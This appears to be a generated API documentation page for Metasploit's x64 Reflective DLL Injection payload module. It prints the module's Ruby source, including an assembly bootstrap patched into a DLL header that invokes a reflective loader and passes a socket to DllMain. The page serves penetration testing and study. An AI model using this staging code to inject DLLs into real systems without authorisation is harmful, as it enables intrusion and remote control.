Module: Msf::Payload::Windows::ReflectiveDllInject_x64

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_dll(opts = {}) ⇒ Object



40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 40

def asm_invoke_dll(opts={})
  asm = %Q^
      ; prologue
        db 0x4d, 0x5a         ; 'MZ' = "pop r10"
        push r10              ; back to where we started
        push rbp              ; save rbp
        mov rbp, rsp          ; set up a new stack frame
        sub rsp, 32           ; allocate some space for calls.
        and rsp, ~0xF         ; Ensure RSP is 16 byte aligned
      ; GetPC
        call $+5              ; relative call to get location
        pop rbx               ; pop return value
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader()
        add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
        call rbx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
        ; offset from ReflectiveLoader() to the end of the DLL
        mov r8, rdi           ; r8 contains the socket
        mov rbx, rax          ; save DllMain for another call
        push 4                ; push up 4, indicate that we have attached
        pop rdx               ; pop 4 into rdx
        call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
        ; push the exitfunk value onto the stack
        mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
        push 5                ; push 5, indicate that we have detached
        pop rdx               ; pop 5 into rdx
        call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
  ^
end

#initialize(info = {}) ⇒ Object



18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 18

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X64,
    'PayloadCompat' => { 'Convention' => 'sockrdi' },
    'Stage'         => { 'Payload'   => "" }
    ))

  register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
end

#library_pathObject



36
37
38
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 36

def library_path
  datastore['DLL']
end

#stage_payload(opts = {}) ⇒ Object



72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 72

def stage_payload(opts = {})
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(library_path)

  asm_opts = {
    rdi_offset: offset,
    exitfunk:   'thread'  # default to 'thread' for migration
  }

  asm = asm_invoke_dll(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

  # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
  if bootstrap.length > 62
    raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end